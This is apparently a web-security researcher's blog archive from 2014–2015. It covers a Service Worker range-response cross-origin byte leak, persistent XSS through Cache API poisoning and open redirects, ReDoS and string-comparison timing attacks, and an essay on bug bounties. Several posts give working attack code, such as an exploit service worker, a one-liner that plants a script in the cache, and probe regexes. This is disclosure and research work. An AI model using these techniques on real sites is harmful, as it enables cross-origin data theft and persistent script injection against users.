Sunday, October 04, 2015

Range Responses: Mix, Match & Leak


The videos from AppSec 2015 are now online, and the Service Workers talk is too. Anyway, this post is about another of the slides in the presentation, the one about Range Requests / Responses (more commonly known as Byte Serving) and Service Workers.

As things go, it turns out you can read content cross-domain with this attack, and this post explains how that works. Range Responses are essentially normal HTTP responses that only contain a subset of the body. It works like this:
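For example, a request for the first 100 bytes of a file, and its reply, might look roughly like this (the path and sizes are made up for illustration):

  GET /video.ogg HTTP/1.1
  Range: bytes=0-99

  HTTP/1.1 206 Partial Content
  Content-Range: bytes 0-99/5000
  Content-Length: 100

  <first 100 bytes of the body>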

It's relatively straightforward! With service workers in the mix, you can do similar things:

And, I mean, what happens there is that the Service Worker intercepts the first request and gives you LoL instead of Foo. Note that this works cross-origin, since Service Workers apply to the page that created the request (so, say, if one site embeds a video from another site, the embedding site's service worker will be able to intercept the request to the video). One thing to note is that the Service Worker actually controls the total length of the response. What this means is that even if the actual response is 2MB, if the Service Worker says it's 100KB, the browser will believe the Service Worker (it seems browsers respect the first response size they see, in this case, the one from the service worker).

This all started when I noticed that you could split a response in two: one part generated by a Service Worker and one that isn't. To clarify, the code below intercepts a request to a song. What's interesting about it is that it actually serves part of the response from the Service Worker (the first 3 bytes).

Another interesting aspect is that the size of the file is truncated to 5,000 bytes. This is because the browser remembers the first provided length.

The code for this (before the bug was patched by Chrome) was:
  // Basic truncation example
  if (url.pathname == '/wikipedia/ru/c/c6/Glorious.ogg') {
    if (e.request.headers.get('range') == 'bytes=0-') {
      console.log('responding with fake response');
      // serve the first 3 bytes ("Ogg") ourselves and claim a 5,000 byte total
      e.respondWith(
        new Response(
          'Ogg', {status: 206, headers: {'content-range': 'bytes 0-3/5000'}}));
    } else {
      // let the network answer the follow-up range requests
      console.log('ignoring request');
    }
  }
So, to reiterate, the Service Worker responds with "Ogg" as the first three bytes, and truncates the response to 5,000 bytes. Alright, so what can you do with this? Essentially, you can partially control audio/video responses, but it's unlikely this can cause a lot of problems, right? I mean, so what if you can make a bad song last 1 second rather than 30 seconds?

To exploit this we need to take a step back and see the data as the video decoder sees it. In essence, the video decoder doesn't actually know anything about range responses, it just sees a stream of bytes. Imagine if the video that the decoder sees had the following format:

  • [Bytes 0-100] Video Header
  • [Bytes 101-200] Video Frame
  • [Bytes 201-202] Checksum of Video Frame
Now imagine that the header and the video frame (bytes 0-200) come from the Service Worker, while the checksum (bytes 201-202) comes from the target/victim site. A clever attacker would send all 65,536 possible video frames until one of them doesn't error out, and then we would know the value of bytes 201 and 202 of the target/victim site.

I searched for a while for a video format or container with this property, but unfortunately didn't find one. To be honest, I didn't look too hard, as it's really confusing to read these specs; after about an hour of searching and scratching my head I gave up, and decided to do some fuzzing instead.

The fuzzing was essentially like this:
  1. Get a sample of video and audio files.
  2. Load them in audio/video tags.
  3. Listen to all events.
  4. Fetch the video from length 0-X, and claim a length of X+1.
  5. Have the last byte be 0xFF.
  6. Repeat
And whenever it found a difference between the response for 0-X and the response for 0-(X+1), that means there's an info leak! I did this, and after a few hours (and after wasting my time looking at MP3 files, which seem to just give out approximate durations at random) I found a candidate. Turns out it wasn't a checksum, it was something even better! :)
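In case it's useful, here is a minimal sketch of what such a harness could look like (the names, events, and timings are assumptions, not the original code):

  // Hypothetical fuzzing harness: load a media file truncated at X with a
  // claimed length of X+1, and record which events fire. A service worker
  // (not shown) serves bytes 0-X and claims 'content-range: bytes 0-X/X+1'.
  function probe(url, x) {
    return new Promise(function(resolve) {
      var media = document.createElement('video');
      var seen = [];
      ['error', 'loadedmetadata', 'canplay', 'encrypted'].forEach(function(ev) {
        media.addEventListener(ev, function() { seen.push(ev); });
      });
      media.src = url + '?truncate=' + x;  // hint for the service worker
      setTimeout(function() { resolve(seen); }, 2000);
    });
  }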

So, I found that a specific Encrypted WebM video errors out when truncated to 306 bytes if the last byte is greater than 0x29, but triggers an onencrypted event when it's less than that. This seems super weird, but that's a good start, I guess. I created a proof of concept, where I tested whether the byte in a cross-origin resource is less than 0x29 or not. If you have a vulnerable browser (Chrome <=44) you can see this proof of concept here:
If you compare both pages you will see that one says PASS and the other says FAIL. The reason is that at position 306 of one site's robots.txt there is a new line, while at position 306 of the other's there is a letter.

Good enough you might think! I can now know whether position 306 is a space or not. Not really very serious, but serious enough to be cool, right? No. Of course not.

First of all, I wanted to know how to make this apply to any offset, not just 306. That turned out to be easy: you just create another EBML element of arbitrary size before the interesting byte, and make it as long as you need. First problem solved; now you can choose the byte offset you are testing.

But still, the only thing I can learn is whether the character at that position is a space or not. So, I started looking into why it errored out, and it turns out it was because the dimensions of the video were too big. There is a limit on the pixel size of a video, and the byte at position 306 happened to be part of the video's height, which made it larger than the allowed maximum.

So, well.. now that we know that, can we learn the exact value? What if we tried to load the video 256 times, each time with a different width value, so that the size check overflows depending on the secret height byte? The formula the video decoder was using for calculating the maximum dimensions was (roughly, reconstructed from the description below):

  width * height > INT_MAX / 8  =>  error

So! Seems easy enough then. I get the minimum width at which it errors out, and calculate its complement relative to INT_MAX/8 (minus 128), and that's the value of the byte at that position. Since this is a "less than" comparison, you can find this minimum value with a simple binary search.
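The search could look something like this (a sketch; errorsWithWidth(i) is an assumed helper that loads the video with the i-th candidate width and resolves to whether decoding failed):

  // Binary-search over 256 candidate widths (one per possible byte value)
  // for the smallest one that makes the decoder error out; that index maps
  // back to the secret byte.
  async function leakByte(errorsWithWidth) {
    var lo = 0, hi = 255;
    while (lo < hi) {
      var mid = (lo + hi) >> 1;
      if (await errorsWithWidth(mid)) hi = mid;  // errors: threshold at or below mid
      else lo = mid + 1;                         // plays: threshold above mid
    }
    return lo;
  }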

And that's it. I made a slightly nicer exploit here, although the code is quite unreadable. The PoC will try to steal the target site's robots.txt byte by byte.

Severity-wise, fortunately, this isn't an end-of-the-world situation. Range Responses (or.. Byte Serving) don't actually work on any dynamically generated content I found online. This is most likely because dynamically generated content has no stable byte offsets, so requesting it in chunks doesn't make sense.

And that's it for today! It's worth noting that this possibly isn't specific to Service Workers, as HTTP redirects seem to have a similar effect (you make two requests to a same-origin video; the first time you respond with a truncated video, the second time you redirect to another domain).

Especially since Service Workers aren't widely supported yet. Feel free to write a PoC for that (you can use this one for inspiration). And once the bug is public, you can follow along with the bug discovery here and the spec discussion here.

The bug is fixed in Chrome, but I didn't test other browsers as thoroughly for lack of time (and this blog post is already delayed like 3 months because of Chrome, so I didn't want to embargo it further). If you do find a way to exploit this elsewhere, please let me know the results; I'm happy to help if you get stuck.

Have a nice day!

Tuesday, September 22, 2015

Not about the money

This applies to all posts in this blog, but just as a reminder. What I say here doesn't necessarily have to reflect the opinions of my employer. This is just my personal view on the subject.

I want to briefly discuss bug bounties, security rewards, and security research in general. Mostly because a lot has changed in the last five years: there are many new players, some giving rewards, and some receiving them.


As a brief introduction, I'll preface this by explaining why I (personally) used to (and continue to) report bugs back when there was no money involved, and then try to go from there to where we are today.

Before there were bug bounties, I (and many others) used to report bugs for free to companies, and we usually got "credit" as the highest reward, but I actually didn't do it for the credit (it was a nice prize, but that's it).

The reason I did it was because I am a user and I (selfishly) tried to make the products I used, better and safer for me. Another reason was that the challenge of finding bugs in "big" companies was like solving an unsolvable puzzle. Like the last level of a wargame that the developers thought no one could solve.


With that said, I was super excited when companies started paying for bugs (mostly because I had no money), but also because it felt "right". For a couple of reasons, but mostly because money is cheap for companies to give, and it is a good way to materialize appreciation.

Rewards are a great way to say "thank you for your time and effort". It's like a gift, that just happens to come in US Dollars. Before money, T-Shirts were the equivalent, and sometimes even handwritten notes that said thank you.

It goes without saying that respect was also a big factor for me. Speedy responses, a human touch, and honest feedback always mattered a lot to me, and gave me confidence back when I was starting. Especially when I learnt something new.


It is my view, that we shouldn't call them "Bug Bounty Programs", I would like them to be called "Bug Hunter Appreciation Programs". I don't like the term "Bug Bounty", because bounty sounds a lot like it's money up for grabs, when the attitude is that of a gift, or a "thank you, you are awesome".

In other words, rewards are gifts, not transactions.

Rewards, in my view, are supposed to show appreciation, and they are not meant to be a price tag. There are many ways to show appreciation; it can go from a simple "thank you!" in an email or in public, all the way to a job offer or a contract. In fact, I got my first job this way.

For companies, I actually think that the main value reward programs provide isn't the "potential cyber-intelligence capabilities of continuous pentesting" or anything ridiculous like that, but something a lot simpler: building and maintaining a community around you, and you do that by building relationships.


Think about it this way. These bug hunters are also users of the products they found bugs on, and then these users go and make these products better for everyone else. And in return, the companies "thank" these users for their help for making it better not just for them, but for everyone.

These users also, eventually, become more familiar with these products than the developers themselves, and that is without even having access to the source code. These users will know about all the quirks of the product, and will know how to use them to their advantage. These are not power users, they are a super-powered version of a user.

And reward programs were built for these users, for those that did it back when money wasn't involved. They are there as a sign of appreciation and a way to recognize the value of the research.


The traditional way of saying "thanks" for vulnerability research has been recognition. For recognition to be valuable it doesn't necessarily have to come from the affected product or company, but rather it could come from the press, or from others in the community. Having your bug be highlighted as a Pwnie is nice, for example, even more so than a security bulletin by the affected company.

More recently, it's become common for money to supplement recognition (and some companies apparently also use it to replace recognition, requiring the researcher not to talk about the bug, or not to talk badly about the affected company). It's quite interesting that this isn't usually highlighted, but I think it's quite important. For many of us, recognition is more important than money, because we depend so much on working with and learning from others that silence diminishes the value of our work.


One question that I don't see asked often enough is: How to decide reward amounts?

First of all, let's consider that they are gifts, not price tags. If you could come up with a gift that feels adequate for a user that is going out of their way to make (your) product better for everyone, what would it be?

It might very well be that it isn't money! Maybe it is free licenses for your product, or invitations to parties or conferences. Maybe it's just an invite to an unreleased product. Doing this at scale, though, might prove difficult.. so if you have to use money, maybe start with what it costs to go out one night for dinner and a movie, and go from there to calculate higher rewards.

This is one of the reasons I don't really like "micro rewards" for $10 USD or so. Because while they are well-intentioned, they also convey the wrong message. I do realize they are valuable in bulk (products that give out these micro rewards usually have a lot of low hanging fruit), but rewarding individual bugs at low rewards also gives the feeling you are just being used for crowd sourcing, or as a "Bulk Bounty".

In any case, I appreciate this is mostly the wrapping of the message being delivered, but I think the message matters when you are dealing with money. The difference between you being "the user" and you being "the product" changes the perception and relationship between companies and users.


Two of the most important aspects of any relationship are trust and respect. Coming back to the earlier point about money, I really like to see how "no reward" responses are written at different companies, because they show how much the response feels like a transaction, and how much it feels like appreciation.

Maybe somewhat counter-intuitively for some, trust goes both ways. Trusting bug hunters makes response teams more trustworthy, and vice-versa. That means accepting the possibility that you are wrong, both when reporting a bug (even if the bug seems to be valid, maybe you are wrong!) and when handling one (even if the bug seems to be invalid, maybe it is valid!). This is particularly important when communicating disagreements.

In any case, whatever the decision was, just saying "thanks" goes a long way. Even the slightest hint of disrespect can ruin an otherwise strong relationship, especially in a medium as cold as email. What is even better is to be transparent about the rationale for the "no reward" response. This is difficult, logistically, as "no reward" decisions are the bulk of the responses sent by any program, but doing a good job here goes a long way towards fostering trust.


At the end of the day, a vulnerability report is simply an attempt at helping the product. Such help sometimes isn't welcome ("best bug is unknown bug") and sometimes it's not helpful at all (invalid reports, for example), but in any case, it's help. Accepting help when you need it, saying thanks when you don't, and then helping back when you can is essentially team work.

Another aspect is that sometimes you can reciprocate a vulnerability report with help. If a bug hunter seems lost or started off on the wrong foot, a little nudging and education can go a very long way. In fact, this is one of the most amazing realizations I've had in these past 4 years: the most insistent researchers that send the most reports are also the most enthusiastic and eager to learn.

Investing some time helping via coaching and education rather than just depending on automated advice or scoring and rankings helps to create and grow a community. These bug hunters want to help, why don't you help them? It needs time and patience, but it will be worth it. Some small amount of personal feedback is all that is needed. You can't automate relationships.


Finally, something amazing happened. Some Bug Hunters started getting a reasonable amount of money out of this! While these programs were originally created to be more like winning the lottery, some very talented individuals actually became really good at this.

The consequences are actually quite interesting. If you can have a sustainable life off white hat vulnerability research, you also become more dependent on these relationships than ever, and trust becomes a critical aspect for sustaining this relationship in the long term. Transparency and clarity on decisions and consistency suddenly become not just best practices but guiding principles.

Another interesting challenge is that of long term planning. Finding bugs every day might make you more efficient at it, but companies ultimately want to make finding these bugs harder and harder. This creates some uncertainty about your future, and about how to sustain this for a long time.

Then there are other challenges. These programs are quite unique and explaining them can be challenging for their legal and fiscal implications. I still remember when I got my first reward from Mozilla it was a bit awkward explaining to my bank why I had money being sent from abroad. I can just imagine having to do this every couple weeks, would be crazy.


It's not about the money. It is about working together and keeping us all safe.
  • If you feel your reward wasn't as high as you expected, maybe your bug's impact wasn't understood correctly, and that also might mean it was fixed incorrectly. Make sure there are no misunderstandings.
  • If there are no misunderstandings, then take the reward as what it is - a gift. It's not a bill for your time, it's not a price for your silence, it's not a bid for your bug's market price. It's just a thank you.
  • If you don't get credit for the bug you found, but you think it is a cool bug, then get credit for yourself! Blog about it, and share it with your peers. Make sure the bug is fixed (or at least give a heads up before making it public, if it's not gonna be fixed quickly).
  • Bug hunters are also users. Delight them with excellent customer service. Money is just a way to say thank you, it isn't an excuse to have them do work.
  • Appreciation, Recognition and Transparency (ART) are the pillars of a well-run security response program.
  • If you find yourself buried in low quality reports, invest some time to help the reporters improve. Ignoring the problem won't make it go away.
  • Invest as much time as possible knowing about your community. Meet them face to face, invite them for dinner! Bug hunters are and will always be your most valuable users (including those that just started learning).

Wednesday, May 27, 2015

[Service Workers] Secure Open Redirect becomes XSS Demo

This is the shortest delay between blog posts I've had in a while, but I figured that since my last post had some confusing stuff, it might make sense to add a short demo. The demo application has three things that enable the attack:

  1. An open redirect. Available at /cgi-bin/redirect?continue=.
  2. A Cache Service Worker. Available at /sw.js.
  3. A page that embeds images via <img crossorigin="anonymous" src="" />.
And the attacker's site has one thing:
  1. A CORS enabled attack page. Available at /cgi-bin/attack.
Let's do the attack then! For it to work we need two things to happen:
  • The service worker must be installed.
  • A request to our attack page must be cached with mode=cors.
Our index.html page will do both of those things for us.
[Interactive demo: a "Poison Cache" form with an "Image URL" field and a submit button.]

When you click submit above the following things will happen:
  1. A service worker will be installed for the whole origin.
  2. An image tag pointing to the open redirect will be created.
  3. The service worker will cache the request with the CORS response of the attacker.
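Roughly, the demo's index.html does something like this (a sketch; the attacker origin and paths are placeholders, not the demo's actual code):

  navigator.serviceWorker.register('/sw.js').then(function() {
    // Load the open redirect as a CORS-enabled image. The redirect bounces
    // to the attacker's CORS page, and the naive service worker caches the
    // attacker's response under the same-origin request URL.
    var img = document.createElement('img');
    img.crossOrigin = 'anonymous';
    img.src = '/cgi-bin/redirect?continue=' +
        encodeURIComponent('https://attacker.example/cgi-bin/attack');
    document.body.appendChild(img);
  });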
If all went well, the page above should be "poisoned", and forever (or until the SW updates its cache) you will get the XSS payload. Try it (note that you must have first "poisoned" the response above; if you click the button below before poisoning the cache, you will ruin the demo forever, since an opaque response will get cached ;):
If the demo doesn't work for you, that probably means you navigated to the attack page before caching the CORS response. If that's the case, you will need to clear the cache.

Note you need Chrome 43 or later for this to work (or a nightly version of Firefox with the flags flipped). Hope this clarifies things a bit!

Monday, May 25, 2015

[Service Workers] New APIs = New Vulns = Fun++

Just came back from another great HackPra Allstars, this time in the beautiful city of Amsterdam. Mario was kind enough to invite me to ramble about random security stuff I had in mind (and this year it was Service Workers). The presentation went OK and it was super fun to meet up with so many people, and watch all those great presentations.

In any case, I promised to write a blog post repeating the presentation in written form. I was hoping to first watch the video to see what mistakes I might have made and correct them in the blog post, but the video is not online yet. So, until then, this post is about something that wasn't mentioned in the talk.

This is about the types of vulnerabilities that applications using Service Workers are likely to create. To start, I just want to say that I totally love Service Workers! The APIs are easy to use and understand, and the debugging tools in Chrome are beautiful and well done (very important, since tools such as Burp or TamperChrome wouldn't work as well with offline apps, as no requests are actually made). You can clearly see that a lot of people have thought hard about this problem, and there is some serious effort around making offline application development possible.

The reason this blog post content wasn't part of the presentation is because I thought it already had too much content, but if you don't know how Service Workers work, you might want to see the first section of the slides (as it's an introduction) or you can read this article or this video.

Anyway, so back to biz.. Given that there aren't many "real" web applications using Service Workers, I'll be using the service-worker samples from the w3c-webmob, but as soon as you start finding real service worker usage take a look and let me know if you find these problems too!

There are two main categories of potential problems I can see:
  1. Response and Caching Issues
  2. Web JavaScript Web Development

Response and Caching Issues

The first "category" or "family" of problems are response and caching issues. These are issues that are present because of the way responses are likely to be handled by applications.

Forever XSS

The first problem, which is probably kind-of bad, is the possibility of turning a reflected XSS into a persistent XSS. We've already seen this type of problem based on APIs like localStorage before, but what makes this different is that the Cache API is actually designed to do exactly that!

When the site is about to request a page from the web, the service worker is consulted first. The service worker at this point can decide to respond with a cached response (the logic is totally delegated to the Service Worker). One of the main use-cases for service workers is to serve a cached copy of the request. This cache is programmatic and totally up to the application to decide how to handle it.

One coding pattern for Service Workers is to respond with whatever is in the cache, if available, or to make a request if not (and cache the response). In other words, in those cases, no request is ever made to the server if the request matches a cached response. Since this Cache database is accessible to any JS code running in the same origin, an attacker can pollute the Cache with whatever it wants, and let the client serve the malicious XSS for ever!
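That pattern looks roughly like this (a sketch; the cache name is assumed):

  self.addEventListener('fetch', function(e) {
    e.respondWith(
      caches.match(e.request).then(function(cached) {
        if (cached) return cached;  // cache hit: the network is never consulted
        return fetch(e.request).then(function(response) {
          return caches.open('prefetch-cache-v1').then(function(cache) {
            cache.put(e.request, response.clone());  // cache for next time
            return response;
          });
        });
      })
    );
  });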

If you want to try this out, go here:

Then fake an XSS by typing this in the console:

caches.open('prefetch-cache-v1').then(function(cache){cache.put(new Request('index.html', {mode: 'no-cors'}), new Response('\x3cscript>alert(1)\x3c/script>', {headers: {'content-type': 'text/html'}}))})

Now whenever you visit that page you will see an alert instead! You can use Control+Shift+R to bypass it once, but when you visit the page again, the XSS will come back. It's actually quite difficult to get rid of this XSS: you have to manually delete the cache :(.

This is likely to be an anti-pattern we'll see often in new Service-Worker-enabled applications. To prevent it, one of the ideas from Jake Archibald is to simply check the "url" property of the response: if the URL is not the same as the request's, simply don't use it, and discard it from the cache. This idea is quite important, and I'll explain why below.

When Secure Open Redirects become XSS

A couple of years ago, in a presentation with thornmaker, we explained how open redirects can result in XSS and information leaks. They were mostly limited to things such as redirecting to insecure protocols (like javascript: or data:). Service Workers, however, and specifically some of the ways the Cache API is likely to be used, introduce yet another possibility, and one that is quite bad too.

As explained before, the way people seem to be coding over the Cache API is by reading the Request, fetching it, and then caching the Response. This is tricky, because when a service worker renders a response, it renders it from the same origin it was loaded from.

In other words.. let's say you have a website that has an open redirect..
And you have a service worker like this one:
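The original snippet is elided, but it was essentially a "re-fetch and cache everything" worker, something like this sketch:

  self.addEventListener('fetch', function(e) {
    e.respondWith(
      fetch(e.request).then(function(response) {
        return caches.open('v1').then(function(cache) {
          // note: keyed by the *request* URL, even if fetch() followed a redirect
          cache.put(e.request, response.clone());
          return response;
        });
      })
    );
  });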
What that service worker does, like the previous one, is simply cache every request that goes through by re-fetching it. The problem: when the request hits the open redirect, the fetch follows the redirect to the attacker's site, and the service worker caches the attacker's response under the original same-origin URL!

That means that the next time the user goes to the redirect URL, the response will be served from the cache, and instead of getting a 302 redirect, they will get the attacker's content.

Note that for this to work, the attacker's page must include Access-Control-Allow-Origin: * as a response header, as otherwise the response won't be accepted. And you need to make the request CORS-enabled (with a cross-origin image or embed request, for example).

This means that an open redirect can be converted into a persistent XSS, and is another reason why checking the url property of the Response before rendering it is so important (both for responses from the Cache and for code like event.respondWith(fetch(event.request))). Even if you have never had an XSS, you can introduce one by accident. If I had to guess, almost all usages of Service Workers will be vulnerable to one or another variation of these attacks if they don't implement the response.url check.

There's a bunch of other interesting things you can do with Service Workers and Requests / Responses, mentioned in the talk and that I'll try to blog about later. For now though, let's change subject.

Web JavaScript Web Development

This will sound weird to some, but the JavaScript APIs in the browser don't actually include any good APIs for building web responses. What this means is that Service Workers will now be kind-of like web servers, but are being put there without any APIs for secure web development, so it's likely they will introduce a bunch of cool bugs.

JavaScript Web APIs aren't Web Service APIs

For starters, the default concerns are things that affect existing JS-based server applications (like Node.js): everything from RegExp bugs (because the JS APIs aren't secure by default) to the JSON APIs' lack of encoding.

But another, more interesting problem is that the lack of templating APIs in Service Workers means people will write code like this, which of course means it's gonna be full of XSS. And while you could import a templating library with strict contextual auto-escaping, the lack of a default library means people are likely to use insecure alternatives or just default to string concatenation (note that things like Angular and Handlebars won't work here, because they work at the DOM level, and Service Workers don't have access to the DOM as they run way before the DOM is created).
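The kind of code I mean is something along these lines (a made-up sketch, not one of the linked samples):

  self.addEventListener('fetch', function(e) {
    // attacker-controlled input concatenated straight into HTML: XSS
    var name = e.request.url.split('name=')[1] || 'world';
    e.respondWith(new Response('<h1>Hello ' + name + '</h1>',
        {headers: {'content-type': 'text/html'}}));
  });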

It's also worth noting that the asynchronous nature of Service Workers (event-driven and promise-based), mixed with developers who aren't used to it, is extremely likely to introduce concurrency vulnerabilities in JS if people abuse the global scope. That isn't the case today, but it's very likely to be the case soon.

Cross Site Request Forgery

Another concern is that CSRF protection will have to behave differently for Service Workers. Specifically, Service Workers will most likely have to depend more on referrer/origin based checks. This isn't bad in and of itself, but mixing it with online web applications will most likely pose a challenge. Funnily, none of the demos I found online have CSRF protection, which underscores the problem, but also makes it hard for me to give you examples of why it's gonna be hard.

To give a specific example, if a web application is meant to work while offline, how would such application keep track of CSRF tokens? Once the user comes online, it's possible the CSRF tokens won't be valid anymore, and the offline application will have to handle that gracefully. While handling the fallback correctly is possible by simply doing different checks depending on the online state of the application, it's likely more people will get it wrong than right.


I'm really excited to see what type of web applications are developed with Service Workers, and also what type of vulnerabilities they introduce :). It's too early to know exactly, but some anti-patterns are clearly starting to emerge as a result of the API design, or of the existing mental models in developers' heads.

Another thing I wanted to mention, before closing up is that I'll start experimenting writing some of the defense security tools I mentioned in the talk, if you want to help out as well, please let me know!

Saturday, May 31, 2014

[Matryoshka] - Web Application Timing Attacks (or.. Timing Attacks against JavaScript Applications in Browsers)

Following up on the previous blog post about wrapping overflow leak on frames, this one is also regarding the presentation Matryoshka that I gave in Hamburg during HackPra All Stars 2013 during Appsec Europe 2013.

The subject today is web application timing attacks. The idea is to present a couple of techniques for attacking another website using timing attacks. Timing attacks are very popular in cryptography, and usually focus on either remote services or local applications. Recently, they've become somewhat popular, and are being used to attack browser security features.

Today the subject I want to discuss is not attacking the browser, or the operating system, but rather, other websites. In specific, I want to show you how to perform timing attacks cross-domain whenever a value you control is used by another web application.

The impact of successfully exploiting this vulnerability varies depending on the application being attacked. To be clear, what we are attacking are JavaScript heavy applications that handle data somehow controlled by another website, such as cookies, the URL, referrer, postMessage, etc..

Overall though, the attack itself isn't new, and its application to browsers is probably predictable.. but when discussed it's frequently dismissed as unexploitable or unrealistic. Now, before I get your hopes up: while I think it's certainly exploitable and realistic, it isn't as straightforward as other attacks.

We know that you can obviously tell if your own code runs faster or slower, but, as some of you might want to correct me.. that shouldn't matter. Why? Well, because of the Same Origin Policy. In case you are not aware, the Same Origin Policy dictates that one origin can't interact with another. It defines a very specific subset of APIs where communication is safe (like, say, navigation, postMessage, or CORS).

The general wisdom says that to be vulnerable to information leak attacks, you need to opt-in to be vulnerable to them. That is, you have to be doing something stupid for stupid things to happen to you. For example, say you have code that runs a regular expression on some data, like:

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        e.source.postMessage('got a match!', e.origin);
    }
};

Well, of course it will be possible to leak information.. try it out here:

  • The secret is 0.0
  • The secret is 0.1
  • The secret is 0.2
  • ...
  • The secret is 0.9

You can claim this code is vulnerable and no one would tell you otherwise. "You shouldn't be writing code like this (tm)".

Now, what about this?

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
    e.source.postMessage('finished', e.origin);
};

Well, now it's tricky, right? In theory, this script isn't leaking any information to the parent page (except of course, how long it took to run the regular expression). Depending on who you ask, they will tell you this is a vulnerability (or.. not).

Now, it clearly is vulnerable, but let's figure out exactly why. There is one piece of information that is leaked, and that is, how long it took to run the regular expression. We control the regular expression, so we get to run any regular expression and we will get to learn how long it took to run.

If you are familiar with regular expressions, you might be familiar with the term "ReDoS", a family of regular expressions that perform a Denial of Service attack on the runtime because they run in exponential time. You can read more about it here. The general premise is that you can make a regular expression take forever if you want to.

So, with that information, we can do the same attack as before, but this time, we will infer if we had the right match simply by checking if it took over N seconds to respond to our message, or well... if it returned immediately.

Let's give it a try:

  • The secret is 0.0[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.1[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.2[0-9.]+(.{0,100}){12}XXX
  • ...
  • The secret is 0.9[0-9.]+(.{0,100}){12}XXX

Did you notice that the right answer took longer than the others?

If you are an average security curmudgeon you will still say that the fault is at the vulnerable site, since it's opting-in to leak how long it took to run the regular expression. All developers are supposed to take care of these types of problems, so why not JavaScript developers?

Alright then, let's fix up the code:
onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
};

That clearly has no feedback loop back to the parent page. Can we still attack it?

Well, now it gets tricky. When I told you that the Same Origin Policy isolates one origin from another, I wasn't being totally honest: the JavaScript code of both origins runs in the same thread. That is, if you have 3 iframes pointing to three different origins, all of them run in the same thread.

Said another way, if one of them suddenly decides to run into an infinite loop, neither of the other two will be able to run any JavaScript code. Don't believe me? Give it a try!


Did you notice that when you looped the "snakes" the counters in the other two iframes stopped? That's because both, the snakes and the puppies and the kittens all run in the same thread, and if one script keeps the thread busy, all the other scripts are paused.

Now, with that piece of information, a whole new world opens up to us. We don't need the other page to surrender any information: simply by running in the same thread, we can measure how long its code takes to run!

One way to attack this is by simply asking the browser to run a specific piece of code every millisecond, and whenever we don't run, that means there's some other code keeping the interpreter busy at the time. We keep track of these delays and we then learn how long the code took to run.
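Something like this (a sketch; the threshold and reporting are made up):

  // Watch for gaps in our own 1ms heartbeat: if we didn't get scheduled,
  // some other same-thread script (the victim's handler) was running.
  var last = performance.now();
  setInterval(function() {
    var now = performance.now();
    if (now - last > 5) console.log('victim busy for ~' + (now - last) + 'ms');
    last = now;
  }, 1);
  // trigger the victim's onmessage handler with our ReDoS payload
  frames[0].postMessage('The secret is 0.1[0-9.]+(.{0,100}){12}XXX', '*');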

Alright, but you might feel a bit disappointed, since it's really not common to have code that runs regular expressions on arbitrary content.. so this attack is kinda lame..

Well, not really. Fortunately there are plenty of web applications that will run all sorts of interesting code for us. When I described the attack to Stefano Di Paola (the developer of DOMinator), he told me that he had always wanted to figure out what you could do with code that does jQuery(location.hash). This used to be an XSS, but then jQuery fixed it.. so no more XSS; now, if the value starts with a '#', it is forced to be a CSS selector.

He said that perhaps jQuery could leak timing information based on how long it took for it to run a specific selector over the code. I told him that was a great idea, and started looking into it. Turns out, there is a "contains" selector in jQuery that will essentially look at all the text content in the page and try to figure out what nodes "contain" such text.

It essentially finds a node, serializes its text contents, and then searches for the given value inside them. In a nutshell it does:
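  // Roughly what jQuery's :contains does (a sketch, not jQuery's exact code):
  function contains(elem, text) {
    return (elem.textContent || elem.innerText || '').indexOf(text) > -1;
  }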


Which is interesting, but it doesn't have the ReDoS vector we had with regular expressions. Figuring out if there was a match is significantly more complicated: we need to know if the "haystack" found something (or not), which sounds, well.. complicated.

Can we get such granularity? Is it possible to detect the difference between "aaaa".indexOf("b") and "aaaa".indexOf("a")? There's clearly a running time difference, but the difference is so small we might not be able to measure it.

There is another, even cooler selector: the "string prefix" attribute selector, which matches elements whose attribute value starts with a given string. The original example snippets are elided, but they were along these lines:
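Say you have (hypothetical markup):

  <input id="token" value="s3cr3t">

You can match the beginning of its value with:

  $('input[value^="s3c"]')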
But again, this is even more difficult than the indexOf() attack we were doing earlier.. The question now is: can we detect string comparisons? Can we get enough accuracy that we learn whether a string comparison succeeds?

To make the question clearer.. can we measure in JavaScript the difference between "wrong" == "right" and "right" == "right"?

In theory, it should be faster to compare "wrong" to "right", because the runtime can stop the comparison at the first character, while to be sure that "right" is equal to "right", it needs to compare every character in the string to ensure it's exactly the same.

This should be easy to test. In the following iframe we make a quick experiment and measure:

  • Time taken to compare "aaaa.....a" (200k) to "foobar"
  • Time taken to compare "aaaa.....a" to "aaaa.....a"
We make the comparison 100 times to make the timing difference more explicit.

Unless something's gone totally wrong, you should see something like:
aaa..a == foobar : 0ms
aaa..a == aaa..a : 60ms
These strange-looking results mean, mostly, that comparing two equal long strings takes significantly more time than comparing two obviously different strings. The "obviously", as we will learn, is the tricky part.

What the JavaScript runtimes do is first, they try to take a shortcut. If the lengths are different, then they return false immediately. If they are the same, on the other hand, then they compare char-by-char. As soon as they find a character that doesn't match, it returns false.
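You can reproduce this with something like the following (a rough sketch; absolute numbers will vary per machine and engine):

  var a = new Array(200001).join('a');  // 200k 'a's
  var b = new Array(200001).join('a');  // equal content, different string
  function time(x, y) {
    var t0 = performance.now();
    for (var i = 0; i < 100; i++) { void (x == y); }
    return performance.now() - t0;
  }
  console.log('different:', time(a, 'foobar'), 'ms');
  console.log('equal:    ', time(a, b), 'ms');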

But is it significant? And if so, how significant? To try to answer that question I ran several experiments. For instance, it's 2-10 times faster to make a "false" comparison than a "true" comparison with just 18 characters. That means "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" runs 2 to 10 times slower than "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyyy". To be able to detect that, however, we need a lot of comparisons and a lot of samples to reduce noise. In this graph you can see how many thousands of iterations you need to be able to "stabilize" the comparison. What you should see in that graph is something like:

What that graph means is that after 120,000 iterations (that is, 120,000 comparisons) the difference between "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyyy" and "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" is stable: the true comparison is 6 times slower. And, to be clear, that is with all 18 characters being different. This means that to notice the 6X difference you would need to bruteforce the 18 characters at once. Even in the most optimistic scenario, bruteforcing 18 characters at once is way out of the question.

